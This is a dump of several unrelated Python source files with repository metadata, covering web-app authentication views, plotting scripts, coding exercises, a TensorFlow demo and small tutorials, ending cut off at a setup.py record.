[
"MIT"
] | 1 |
2021-02-25T13:45:24.000Z
|
2021-02-25T13:45:24.000Z
|
app/__init__.py
|
MedPhyDO/app-skeleton
|
1161736ccf356c704c6c13b17fa11aca64b17dac
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
MedPhyDO/app-skeleton
|
1161736ccf356c704c6c13b17fa11aca64b17dac
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Das eigentliche starten der app wird über run erledigt
'''
import logging
from isp.config import ispConfig
from app.db import dbtests
from isp.webapp import ispBaseWebApp
from isp.safrs import system, db
class system( system ):
@classmethod
def _extendedSystemCheck(self):
"""filled Stub Function for api_list (Systeminformationen)
Returns
-------
dict, string
"""
import os
import json
config = ispConfig()
html = "<h4>System Check</h4>"
# --------------- MQTT
mqtt_config = config.get( "server.mqtt" )
mqtt_config_copy = mqtt_config.copy()
mqtt_config_copy.password = "********"
if mqtt_config_copy.get("host", "") == "":
html += '<div class="alert alert-info" >MQTT deaktiviert'
else:
html += '<div class="alert alert-dark" >Prüfe <span class="badge badge-info">server.mqtt</span> - Konfiguration:'
html += '<pre>{}</pre>'.format( json.dumps( mqtt_config_copy.toDict(), indent=2 ) )
mqtt = config.mqttGetHandler()
if not mqtt:
info_class = "danger"
info_text = "MQTT Zugriff ist nicht möglich."
else:
info_class = "info"
info_text = 'MQTT Zugriff ist eingerichtet. <button type="button" class="btn btn-primary" onClick="mqttTest( this )">Prüfen</button>'
html += '<div id="MQTT-checkline" class="alert alert-{} ">{}<div id="MQTT-results" class"alert"></div></div>'.format( info_class, info_text )
html += "</div>"
html += '''
<script>
var box = document.querySelector("#MQTT-checkline");
var result_box = document.querySelector("#MQTT-results");
if ( typeof app.clientMqtt === "object" ) {
app.clientMqtt.subscribe( "MQTT/test", function( msg ) {
box.className = "alert alert-success";
result_box.className = "alert alert-success";
result_box.innerHTML = "MQTT Test erfolgreich";
} );
}
function mqttTest( btn ){
box.className = "alert alert-info";
result_box.className = "";
if ( typeof app.clientMqtt === "object" ) {
result_box.className = "alert alert-danger";
result_box.innerHTML = "MQTT Test nicht erfolgreich.";
app.clientMqtt.publish( "MQTT/test", { "test":"MQTT" } );
} else {
result_box.className = "alert alert-warning";
result_box.innerHTML = "kein clientMqtt vorhanden";
}
}
</script>
'''
return {}, html
# -----------------------------------------------------------------------------
def run( overlay:dict={} ):
''' Startet ispBaseWebApp mit zusätzlichen config Angaben
Parameters
----------
overlay : dict, optional
Overlay Angaben für config. The default is {}.
Returns
-------
webApp : ispBaseWebApp
Die gestartete WebApplication
'''
# Konfiguration öffnen
_config = ispConfig( mqttlevel=logging.WARNING )
_apiConfig = {
"models": [ dbtests, system ],
}
# Webserver starten
webApp = ispBaseWebApp( _config, db, apiconfig=_apiConfig, overlay=overlay )
# mqtt in config schließen
_config.mqttCleanup( )
return webApp
| 33.509091 | 154 | 0.518719 |
d0231afe20a33774afadfa903448f23f5a613d43
| 1,566 |
py
|
Python
|
results/plot_test1.py
|
OxfordSKA/FSCN
|
fc7b01f989553158b3b4d4b66f973cf0f9387998
|
[
"BSD-3-Clause"
] | null | null | null |
results/plot_test1.py
|
OxfordSKA/FSCN
|
fc7b01f989553158b3b4d4b66f973cf0f9387998
|
[
"BSD-3-Clause"
] | null | null | null |
results/plot_test1.py
|
OxfordSKA/FSCN
|
fc7b01f989553158b3b4d4b66f973cf0f9387998
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.ticker import FormatStrFormatter
def main():
df = pd.read_csv('test1.txt', delim_whitespace=True, header=0)
uniform = df.loc[df['weight'] == 'U']
natural = df.loc[df['weight'] == 'N']
# TODO(BM) plot the predicted noise..
opts = dict(marker='.', ms=10)
fig, (ax1, ax2) = plt.subplots(figsize=(8, 8), nrows=2, sharex=False)
fig.subplots_adjust(left=0.125, bottom=0.1, right=0.95, top=0.95,
wspace=0.2, hspace=0.1)
ax1.plot(uniform['num_times'], uniform['rms'], label='uniform', **opts)
ax1.plot(natural['num_times'], natural['rms'], label='natural', **opts)
ax1.legend(frameon=True)
ax1.grid()
ax1.set_xscale('log')
ax1.set_yscale('log')
ax1.set_xlim(0, uniform['num_times'].max()*1.1)
ax1.set_ylabel('Image RMS (Jy/beam)')
ax1.xaxis.set_major_formatter(FormatStrFormatter('%i'))
y = uniform['rms'].values / natural['rms'].values
ax2.plot(uniform['num_times'], y, **opts)
ax2.grid()
ax2.set_xlabel('number of snapshots')
ax2.set_ylabel('uniform rms / natural rms')
ax2.set_xlabel('number of snapshots')
ax2.set_xscale('log')
ax2.set_xlim(0, uniform['num_times'].max() * 1.1)
ax2.xaxis.set_major_formatter(FormatStrFormatter('%i'))
fig.savefig('test1.eps')
plt.close(fig)
if __name__ == '__main__':
main()
| 34.8 | 75 | 0.642401 |
d02bd4e1b3583c2a04099a5fdc72c37a0ead4e39
| 1,016 |
py
|
Python
|
Python/zzz_training_challenge/UdemyPythonPro/Chapter5_Functions/Functions/command_line_arguments2.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/UdemyPythonPro/Chapter5_Functions/Functions/command_line_arguments2.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/UdemyPythonPro/Chapter5_Functions/Functions/command_line_arguments2.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
import argparse
def main():
# erstellt parser
parser = argparse.ArgumentParser()
# Argumente hinzufügen:
# Name: default mit '--' <- Konvention
# help: Optional als Hilfe
# type: Optional: Typ
# required: Wird das argument pflichtend benötigt
#
parser.add_argument("--age", help="Enter your age (int)", type=int, required=True)
parser.add_argument("--name", help="Enter your name (str)", type=str, required=True)
parser.add_argument("--admin", help="Are your an admin? (bool)", type=bool, required=False)
# Einlesen und Zugreifen der Parameter
args = parser.parse_args()
age = args.age
name = args.name
is_admin = args.admin
print(age, type(age))
print(name, type(name))
# Achtung Argumente werden als Strings abgespeichert!! auch wenn Type = bool
# Das heißt auch wenn im Argument "False" angegeben
# wird ist dies kein leerer String und damit "True"
print(is_admin, type(is_admin))
if __name__ == "__main__":
main()
| 32.774194 | 95 | 0.667323 |
ef8f890ecaa6580bfa9a5121d7900b54ad858e04
| 1,191 |
py
|
Python
|
site/public/courses/CS-1.2/src/PlaylistLinkedList-StarterCode/Playlist.py
|
KitsuneNoctus/makeschool
|
5eec1a18146abf70bb78b4ee3d301f6a43c9ede4
|
[
"MIT"
] | 1 |
2021-08-24T20:22:19.000Z
|
2021-08-24T20:22:19.000Z
|
site/public/courses/CS-1.2/src/PlaylistLinkedList-StarterCode/Playlist.py
|
KitsuneNoctus/makeschool
|
5eec1a18146abf70bb78b4ee3d301f6a43c9ede4
|
[
"MIT"
] | null | null | null |
site/public/courses/CS-1.2/src/PlaylistLinkedList-StarterCode/Playlist.py
|
KitsuneNoctus/makeschool
|
5eec1a18146abf70bb78b4ee3d301f6a43c9ede4
|
[
"MIT"
] | null | null | null |
from Song import Song
class Playlist:
def __init__(self):
self.__first_song = None
# TODO: Create a method called add_song that creates a Song object and adds it to the playlist. This method has one parameter called title.
def add_song(self, title):
pass
# TODO: Create a method called find_song that searches for whether a song exits in the playlist and returns its index.
# The method has one parameters, title, which is the title of the song to be searched for. If the song is found, return its index. Otherwise, return -1.
def find_song(self, title):
pass
# TODO: Create a method called remove_song that removes a song from the playlist. This method takes one parameter, title, which is the song that should be removed.
def remove_song(self, title):
pass
# TODO: Create a method called length, which returns the number of songs in the playlist.
def length(self):
pass
# TODO: Create a method called print_songs that prints a numbered list of the songs in the playlist.
# Example:
# 1. Song Title 1
# 2. Song Title 2
# 3. Song Title 3
def print_songs(self):
pass
| 25.891304 | 167 | 0.690176 |
3ea06fc23eba7a15e79146a7206c8b0fa513c80e
| 1,012 |
py
|
Python
|
Interview Preparation Kits/Interview Preparation Kit/Search/Maximum Subarray Sum/maximum_subarray.py
|
xuedong/hacker-rank
|
ce8a60f80c2c6935b427f9409d7e826ee0d26a89
|
[
"MIT"
] | 1 |
2021-02-22T17:37:45.000Z
|
2021-02-22T17:37:45.000Z
|
Interview Preparation Kits/Interview Preparation Kit/Search/Maximum Subarray Sum/maximum_subarray.py
|
xuedong/hacker-rank
|
ce8a60f80c2c6935b427f9409d7e826ee0d26a89
|
[
"MIT"
] | null | null | null |
Interview Preparation Kits/Interview Preparation Kit/Search/Maximum Subarray Sum/maximum_subarray.py
|
xuedong/hacker-rank
|
ce8a60f80c2c6935b427f9409d7e826ee0d26a89
|
[
"MIT"
] | null | null | null |
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the maximumSum function below.
def maximumSum(a, m):
n = len(a)
prefix = [0] * n
current = 0
for i in range(n):
current = (a[i] % m + current) % m
prefix[i] = current
sorted_prefix = sorted(prefix)
sorted_index = sorted(range(n), key=lambda k: prefix[k])
smallest = m
for i in range(n-1):
if sorted_index[i] > sorted_index[i+1]:
diff = sorted_prefix[i+1] - sorted_prefix[i]
if diff < smallest:
smallest = diff
return max(m-smallest, sorted_prefix[n-1])
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
q = int(input())
for q_itr in range(q):
nm = input().split()
n = int(nm[0])
m = int(nm[1])
a = list(map(int, input().rstrip().split()))
result = maximumSum(a, m)
fptr.write(str(result) + '\n')
fptr.close()
| 20.24 | 60 | 0.544466 |
f5ee30ccae569645ce207a8f4ba4d950c86b7b1d
| 112 |
py
|
Python
|
python/python_backup/Python_Progs/PYTHON_LEGACY_PROJECTS/Ineger_manupulation.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/python_backup/Python_Progs/PYTHON_LEGACY_PROJECTS/Ineger_manupulation.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/python_backup/Python_Progs/PYTHON_LEGACY_PROJECTS/Ineger_manupulation.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
a=int(input("Input an integer :"))
n1=int("%s"%a)
n2=int("%s%s"%(a,a))
n3=int("%s%s%s"%(a,a,a))
print(n1+n2+n3)
| 18.666667 | 34 | 0.544643 |
725354e8ddaa17b28ac550df26d697d82cdb31f9
| 829 |
py
|
Python
|
785A-anton-and-polyhedrons.py
|
spreusler/codeforces-loesungen
|
cc8ddcc8a3c5a25906dc92ad001f7e9570a62de3
|
[
"MIT"
] | null | null | null |
785A-anton-and-polyhedrons.py
|
spreusler/codeforces-loesungen
|
cc8ddcc8a3c5a25906dc92ad001f7e9570a62de3
|
[
"MIT"
] | null | null | null |
785A-anton-and-polyhedrons.py
|
spreusler/codeforces-loesungen
|
cc8ddcc8a3c5a25906dc92ad001f7e9570a62de3
|
[
"MIT"
] | null | null | null |
# Name: 785 A. Anton and Polyhedrons
# URL: https://codeforces.com/problemset/problem/785/A
# Language: Python 3.x
def main():
# Variable fuer Summe der Flächen
sum_faces = 0
# Einlesen des Inputs als Integer
n = int(input())
# Erstellung eines Dictionaries mit Keys als String und Values as Integer
faces = {
"Tetrahedron": 4,
"Cube": 6,
"Octahedron": 8,
"Dodecahedron": 12,
"Icosahedron": 20,
}
# Solange n groesser als Null ist Schleife. Ende wenn n gleich Null
while n > 0:
# Aufsummieren der einzelnen Values durch Key Abfrage von input()
sum_faces += faces[input()]
# Herunterzaehlen. Wenn n gleich Null, erfolgt kein input() Aufruf mehr
n -= 1
print(sum_faces)
if __name__ == '__main__':
main()
| 25.121212 | 79 | 0.617612 |
f8276cee39a98985581fcb136de92e1625ba9d12
| 1,720 |
py
|
Python
|
.archive/parse.py
|
gt-big-data/TEDVis
|
328a4c62e3a05c943b2a303817601aebf198c1aa
|
[
"MIT"
] | null | null | null |
.archive/parse.py
|
gt-big-data/TEDVis
|
328a4c62e3a05c943b2a303817601aebf198c1aa
|
[
"MIT"
] | null | null | null |
.archive/parse.py
|
gt-big-data/TEDVis
|
328a4c62e3a05c943b2a303817601aebf198c1aa
|
[
"MIT"
] | 2 |
2018-02-06T00:00:44.000Z
|
2019-06-04T12:43:41.000Z
|
import os
from os import listdir
from os.path import isfile, join, isdir
from operator import itemgetter, attrgetter
from wiki import filter
from string import punctuation
from nltk.corpus import wordnet as wn
wordDict = {}
def countWords():
onlyfiles = [f for f in listdir(".") if isfile(join(".", f))]
#print(onlyfiles)
#wordDict = {}
for file in onlyfiles:
with open(file) as f:
lines = f.readlines()
for line in lines:
line = line.split()
for word in line:
word = word.lower()
strip_punctuation(word)
#print(word + " " + tmp[0].pos())
if word not in wordDict:
wordDict[word] = 0
wordDict[word] += 1
def strip_punctuation(s):
return ''.join(c for c in s if c not in punctuation)
path = os.getcwd() + '/TEDVis'
os.chdir(path)
tedTypes = [f for f in listdir(".") if isdir(join(".", f)) and not f.startswith('.')]
#print(os.getcwd())
for folder in tedTypes:
#print(os.getcwd())
os.chdir(folder)
alphabet = [f for f in listdir(".") if isdir(join(".", f)) and not f.startswith('.')]
print(os.getcwd())
for group in alphabet:
os.chdir(group)
#print(os.getcwd())
countWords()
os.chdir('..')
os.chdir('..')
# os.chdir(folder)
# print(os.listdir('.'))
#onlydirs = [f for f in listdir(".") if isdir(join(".", f))]
#os.chdir('..')
filter(wordDict)
wordList = []
adjList = []
for key in wordDict:
tmp = wn.synsets(key)
if (len(tmp) > 0):
if (tmp[0].pos() == "a"):
adjList.append({"word": key, "frequency": wordDict[key]})
adjList = sorted(adjList, key=itemgetter("frequency"), reverse = True)
print(adjList)
# print(len(wordList))
import json
with open('data.json', 'w') as outfile:
json.dump(adjList[:10], outfile)
| 21.234568 | 87 | 0.634302 |
f86d410e53c9a80f8b0be5203525cea36952c3ff
| 37 |
py
|
Python
|
lib/python3.5/functools.py
|
hwroitzsch/BikersLifeSaver
|
469c738fdd6352c44a3f20689b17fa8ac04ad8a2
|
[
"MIT"
] | 1 |
2020-08-16T04:04:23.000Z
|
2020-08-16T04:04:23.000Z
|
lib/python3.5/functools.py
|
hwroitzsch/BikersLifeSaver
|
469c738fdd6352c44a3f20689b17fa8ac04ad8a2
|
[
"MIT"
] | 5 |
2020-06-05T18:53:24.000Z
|
2021-12-13T19:49:15.000Z
|
lib/python3.5/functools.py
|
hwroitzsch/BikersLifeSaver
|
469c738fdd6352c44a3f20689b17fa8ac04ad8a2
|
[
"MIT"
] | null | null | null |
/usr/local/lib/python3.5/functools.py
| 37 | 37 | 0.810811 |
f8b5e06c38ed307233d83b8f9d69c32d088b385a
| 270 |
py
|
Python
|
Crashkurs TensorFlow/07_Stack.py
|
slogslog/Coding-Kurzgeschichten
|
9b08237038147c6c348d4cf4c69567178e07dd1d
|
[
"Unlicense"
] | 2 |
2020-03-23T14:57:50.000Z
|
2021-03-24T18:12:07.000Z
|
Crashkurs TensorFlow/07_Stack.py
|
slogslog/Coding-Kurzgeschichten
|
9b08237038147c6c348d4cf4c69567178e07dd1d
|
[
"Unlicense"
] | null | null | null |
Crashkurs TensorFlow/07_Stack.py
|
slogslog/Coding-Kurzgeschichten
|
9b08237038147c6c348d4cf4c69567178e07dd1d
|
[
"Unlicense"
] | null | null | null |
# Unterdrückt die AVX2 Warnung
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import tensorflow as tf
a2d = tf.constant([ [1,2,3], [4,5,6] ])
print(a2d)
b2d = tf.reshape(tf.range(7, 13), [2, -1])
print(b2d)
c3d = tf.stack([a2d, b2d])
print(c3d)
print(c3d.numpy())
| 16.875 | 42 | 0.662963 |
f8c3d98f1a948dc486ed3431ba7f098d343daa1b
| 207 |
py
|
Python
|
SoSe-21/Code-Vorlesungen/VL-5/Mathematische-Brechnungen.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | 1 |
2022-03-23T09:40:39.000Z
|
2022-03-23T09:40:39.000Z
|
SoSe-21/Code-Vorlesungen/VL-5/Mathematische-Brechnungen.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | null | null | null |
SoSe-21/Code-Vorlesungen/VL-5/Mathematische-Brechnungen.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | null | null | null |
PI = 3.1415 # Globale Variable
def kreisumfang(radius):
kreisumfang = 2 * PI * radius
return kreisumfang
def zylinder(radius, hoehe):
return hoehe * kreisumfang(radius)
print(zylinder(50, 20))
| 20.7 | 38 | 0.705314 |
e45704b6bef449eb6fe43f4d7767f2ac312cf726
| 5,145 |
py
|
Python
|
Apps/Auswertung/helper.py
|
RGreinacher/bachelor-thesis
|
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
|
[
"MIT"
] | 1 |
2021-04-13T10:00:46.000Z
|
2021-04-13T10:00:46.000Z
|
Apps/Auswertung/helper.py
|
RGreinacher/bachelor-thesis
|
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
|
[
"MIT"
] | null | null | null |
Apps/Auswertung/helper.py
|
RGreinacher/bachelor-thesis
|
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# import python libs
import re
import json
import csv
import argparse
import json
import collections
import copy
from os import listdir
from os.path import isfile, join
from pprint import pprint as pp
from operator import itemgetter
# import project libs
from constants import *
# methods
def read_subject_table():
return read_json_file(SUBJECTS_TABEL_JSON)
def read_json_file(file_name):
file_handler = open(file_name, 'r', encoding='utf-8')
raw_content = file_handler.read()
file_handler.close()
return json.JSONDecoder().decode(raw_content)
def read_corpus_files(path, subject_id = -1):
corpus = []
if subject_id >= 0:
path = "%sVP%s/" % (path, str(subject_id).zfill(2))
for file_name in sorted(listdir(path)):
file_path = join(path, file_name)
if not (isfile(file_path) and (file_name.endswith('.json') or file_name.endswith('.txt'))): continue
if 'VP vorbereitet' in path and file_name.startswith('a_'): continue # ignore raw questionnaire documents
file_handler = open(path + file_name, 'r', encoding='utf-8')
raw_content = file_handler.read()
file_handler.close()
deconded_content = json.JSONDecoder().decode(raw_content)
corpus.append(deconded_content)
return corpus
def reward_for_subject(subject_id):
for reward_index, subject_list in enumerate(REWARDS):
if subject_id in subject_list:
return reward_index
raise NoRewardForSubjectError
def corpus_runner(annotated_corpus):
paragraphs = 0 # total number of paragraphs
sentences = 0 # total number of sentences
tokens = 0 # total tokens
annotations = 0 # chunks
words = 0 # words in chunks
for document in annotated_corpus:
for paragraph in document['data']:
paragraphs += 1
for sentence in paragraph:
sentences += 1
tokens += len(sentence)
for token in sentence:
if 'annotation' in token:
annotations += 1
words += token['annotation']['length']
return (paragraphs, sentences, tokens, annotations, words)
def annotation_durations(subjects_table, annotated_corpus):
durations_per_block = [[]]
block_index = 0
paragraph_index_per_block = -1
for document in annotated_corpus:
durations = document['annotation_duration_per_paragraph']
for paragraph_index in range(0, len(document['data'])):
paragraph_index_per_block += 1
if paragraph_index_per_block == len(subjects_table[block_index]):
durations_per_block.append([])
block_index += 1
paragraph_index_per_block = 0
durations_per_block[block_index].append(durations[paragraph_index])
return durations_per_block
def distribution_per_block(block):
total_class_distribution = [0, 0, 0, 0, 0, 0]
for paragraph in block:
for sentence in paragraph:
for annotation_class in sentence:
total_class_distribution[annotation_class] += 1
return total_class_distribution
def paragraph_is_annotated(paragraph):
for sentence in paragraph:
for token in sentence:
if 'annotation' in token:
return True
return False
def empty_subjects_table(subjects_table):
first_subject = subjects_table[0]
second_subject = subjects_table[1]
empty_blocks = []
if subject_table_block_is_annotated(first_subject[0]):
empty_blocks.append(second_subject[0])
empty_blocks.append(first_subject[1])
empty_blocks.append(second_subject[2])
empty_blocks.append(first_subject[3])
else:
empty_blocks.append(first_subject[0])
empty_blocks.append(second_subject[1])
empty_blocks.append(first_subject[2])
empty_blocks.append(second_subject[3])
return empty_blocks
def subject_table_block_is_annotated(block):
for paragraph in block:
for sentence in paragraph:
if sum(sentence) != len(sentence) * 5:
return True
return False
def annotations_per_subject_table_block(block):
annotations = 0
for paragraph in block:
for sentence in paragraph:
annotations += len(sentence)
return annotations
def next_annotation_index(start, sentence):
current_index = start
for token in sentence[start:]:
if 'annotation' in token:
return current_index
current_index += 1
return -1
def seconds_to_min(seconds):
minutes = int(seconds / 60)
seconds = (seconds % 60)
if seconds < 10:
seconds = "0" + str(seconds)
return "%s:%s" % (minutes, seconds)
def save_json(data, file_name):
with open(file_name, 'w') as outfile:
json.dump(data, outfile)
def save_csv(data_frame_list):
myfile = open(CSV_DATA_FILE_NAME, 'w')
csv_writer = csv.writer(myfile, delimiter=';')
csv_writer.writerow(DATA_FRAME_HEADER)
csv_writer.writerows(data_frame_list)
myfile.close()
| 30.625 | 113 | 0.668416 |
5f5aea15240bbd9611868813c51d975e0aeb66f9
| 467 |
py
|
Python
|
day46/decorator.py
|
nurmatthias/100DaysOfCode
|
22002e4b31d13e6b52e6b9222d2e91c2070c5744
|
[
"Apache-2.0"
] | null | null | null |
day46/decorator.py
|
nurmatthias/100DaysOfCode
|
22002e4b31d13e6b52e6b9222d2e91c2070c5744
|
[
"Apache-2.0"
] | null | null | null |
day46/decorator.py
|
nurmatthias/100DaysOfCode
|
22002e4b31d13e6b52e6b9222d2e91c2070c5744
|
[
"Apache-2.0"
] | null | null | null |
import time
def speed_calc_decorator(function):
def wrapper():
start_time = time.time()
function()
difference = time.time() - start_time
print(f"{function.__name__} run speed: {difference}s")
return wrapper
@speed_calc_decorator
def fast_function():
for i in range(10000000):
i * i
@speed_calc_decorator
def slow_function():
for i in range(100000000):
i * i
fast_function()
slow_function()
| 19.458333 | 62 | 0.642398 |
39973a673c78692566cffd1fbfaf81caca542ccb
| 10,554 |
py
|
Python
|
src/onegov/org/views/auth.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/views/auth.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/views/auth.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
""" The authentication views. """
import morepath
from onegov.core.markdown import render_untrusted_markdown
from onegov.core.security import Public, Personal
from onegov.org import _, OrgApp
from onegov.org import log
from onegov.org.elements import Link
from onegov.org.layout import DefaultLayout
from onegov.org.mail import send_transactional_html_mail
from onegov.user import Auth, UserCollection
from onegov.user.auth.provider import OauthProvider
from onegov.user.errors import AlreadyActivatedError
from onegov.user.errors import ExistingUserError
from onegov.user.errors import ExpiredSignupLinkError
from onegov.user.errors import InvalidActivationTokenError
from onegov.user.errors import UnknownUserError
from onegov.user.forms import LoginForm
from onegov.user.forms import PasswordResetForm
from onegov.user.forms import RegistrationForm
from onegov.user.forms import RequestPasswordResetForm
from purl import URL
from webob import exc
@OrgApp.form(model=Auth, name='login', template='login.pt', permission=Public,
form=LoginForm)
def handle_login(self, request, form, layout=None):
""" Handles the login requests. """
if not request.app.enable_yubikey:
form.delete_field('yubikey')
if self.skippable(request):
return self.redirect(request, self.to)
if form.submitted(request):
redirected_to_userprofile = False
org_settings = request.app.settings.org
if org_settings.require_complete_userprofile:
username = form.username.data
if not org_settings.is_complete_userprofile(request, username):
redirected_to_userprofile = True
self.to = request.return_to(
'/userprofile',
self.to
)
response = self.login_to(request=request, **form.login_data)
if response:
if redirected_to_userprofile:
request.warning(_(
"Your userprofile is incomplete. "
"Please update it before you continue."
))
else:
request.success(_("You have been logged in."))
return response
request.alert(_("Wrong e-mail address, password or yubikey."))
layout = layout or DefaultLayout(self, request)
request.include('scroll-to-username')
layout.breadcrumbs = [
Link(_("Homepage"), layout.homepage_url),
Link(_("Login"), request.link(self, name='login'))
]
def provider_login(provider):
provider.to = self.to
return request.link(provider)
return {
'layout': layout,
'password_reset_link': request.link(self, name='request-password'),
'register_link': request.link(self, name='register'),
'may_register': request.app.enable_user_registration,
'button_text': _("Login"),
'providers': request.app.providers,
'provider_login': provider_login,
'render_untrusted_markdown': render_untrusted_markdown,
'title': _('Login to ${org}', mapping={
'org': request.app.org.title
}),
'form': form
}
@OrgApp.form(model=Auth, name='register', template='form.pt',
permission=Public, form=RegistrationForm)
def handle_registration(self, request, form, layout=None):
""" Handles the user registration. """
if not request.app.enable_user_registration:
raise exc.HTTPNotFound()
if form.submitted(request):
try:
user = self.register(form, request)
except ExistingUserError:
request.alert(_("A user with this address already exists"))
except ExpiredSignupLinkError:
request.alert(_("This signup link has expired"))
else:
url = URL(request.link(self, 'activate'))
url = url.query_param('username', form.username.data)
url = url.query_param('token', user.data['activation_token'])
subject = request.translate(
_("Your ${org} Registration", mapping={
'org': request.app.org.title
})
)
send_transactional_html_mail(
request=request,
template='mail_activation.pt',
subject=subject,
receivers=(form.username.data, ),
content={
'activation_link': url.as_string(),
'model': self
}
)
request.success(_(
"Thank you for registering. Please follow the instructions "
"on the activiation e-mail sent to you."
))
return morepath.redirect(request.link(request.app.org))
layout = layout or DefaultLayout(self, request)
layout.breadcrumbs = [
Link(_("Homepage"), layout.homepage_url),
Link(_("Register"), request.link(self, name='register'))
]
request.include('scroll-to-username')
return {
'layout': layout,
'title': _('Account Registration'),
'form': form
}
@OrgApp.view(model=Auth, name='activate', permission=Public)
def handle_activation(self, request):
if not request.app.enable_user_registration:
raise exc.HTTPNotFound()
users = UserCollection(request.session)
username = request.params.get('username')
token = request.params.get('token')
try:
users.activate_with_token(username, token)
except UnknownUserError:
request.warning(_("Unknown user"))
except InvalidActivationTokenError:
request.warning(_("Invalid activation token"))
except AlreadyActivatedError:
request.success(_("Your account has already been activated."))
else:
request.success(_(
"Your account has been activated. "
"You may now log in with your credentials"
))
return morepath.redirect(request.link(request.app.org))
def do_logout(self, request, to=None):
# the message has to be set after the log out code has run, since that
# clears all existing messages from the session
@request.after
def show_hint(response):
request.success(_("You have been logged out."))
return self.logout_to(request, to)
def do_logout_with_external_provider(self, request):
""" Use this function if you want to go the way to the external auth
provider first and then logout on redirect. """
from onegov.user.integration import UserApp # circular import
user = request.current_user
if not user:
do_logout(self, request)
if isinstance(self.app, UserApp) and user.source:
for provider in self.app.providers:
if isinstance(provider, OauthProvider):
if request.url == provider.logout_redirect_uri(request):
return do_logout(
self,
request,
to=request.browser_session.pop('logout_to', '/')
)
request.browser_session['logout_to'] = self.to
return morepath.redirect(provider.logout_url(request))
@OrgApp.html(model=Auth, name='logout', permission=Personal)
def view_logout(self, request):
""" Handles the logout requests. We do not logout over external auth
providers, since we anyway have like a hybrid login (using id_token to
establish our own login session with different expiration). """
return do_logout(self, request)
@OrgApp.form(model=Auth, name='request-password', template='form.pt',
permission=Public, form=RequestPasswordResetForm)
def handle_password_reset_request(self, request, form, layout=None):
""" Handles the GET and POST password reset requests. """
if request.app.disable_password_reset:
raise exc.HTTPNotFound()
layout = layout or DefaultLayout(self, request)
layout.breadcrumbs = [
Link(_("Homepage"), layout.homepage_url),
Link(_("Reset password"), request.link(self, name='request-password'))
]
if form.submitted(request):
user = UserCollection(request.session)\
.by_username(form.email.data)
url = layout.password_reset_url(user)
if url:
send_transactional_html_mail(
request=request,
template='mail_password_reset.pt',
subject=_("Password reset"),
receivers=(user.username, ),
content={'model': None, 'url': url}
)
else:
log.info(
"Failed password reset attempt by {}".format(
request.client_addr
)
)
response = morepath.redirect(request.link(self, name='login'))
request.success(
_(('A password reset link has been sent to ${email}, provided an '
'account exists for this email address.'),
mapping={'email': form.email.data})
)
return response
return {
'layout': layout,
'title': _('Reset password'),
'form': form,
'form_width': 'small'
}
@OrgApp.form(model=Auth, name='reset-password', template='form.pt',
permission=Public, form=PasswordResetForm)
def handle_password_reset(self, request, form, layout=None):
if request.app.disable_password_reset:
raise exc.HTTPNotFound()
if form.submitted(request):
# do NOT log the user in at this point - only onegov.user.auth does
# logins - we only ever want one path to be able to login, which makes
# it easier to do it correctly.
if form.update_password(request):
request.success(_("Password changed."))
return morepath.redirect(request.link(self, name='login'))
else:
request.alert(
_("Wrong username or password reset link not valid any more.")
)
log.info(
"Failed password reset attempt by {}".format(
request.client_addr
)
)
if 'token' in request.params:
form.token.data = request.params['token']
layout = layout or DefaultLayout(self, request)
layout.breadcrumbs = [
Link(_("Homepage"), layout.homepage_url),
Link(_("Reset password"), request.link(self, name='request-password'))
]
return {
'layout': layout,
'title': _('Reset password'),
'form': form,
'form_width': 'small'
}
| 33.611465 | 78 | 0.622039 |
841e8e7c47a49325e95a24e0cc97279aa3b36aa5
| 620 |
py
|
Python
|
setup.py
|
Pommesmajo09/Subdomains-Scan
|
8d939769fb83251cd0d683cba3916ba070fa6765
|
[
"MIT"
] | null | null | null |
setup.py
|
Pommesmajo09/Subdomains-Scan
|
8d939769fb83251cd0d683cba3916ba070fa6765
|
[
"MIT"
] | null | null | null |
setup.py
|
Pommesmajo09/Subdomains-Scan
|
8d939769fb83251cd0d683cba3916ba070fa6765
|
[
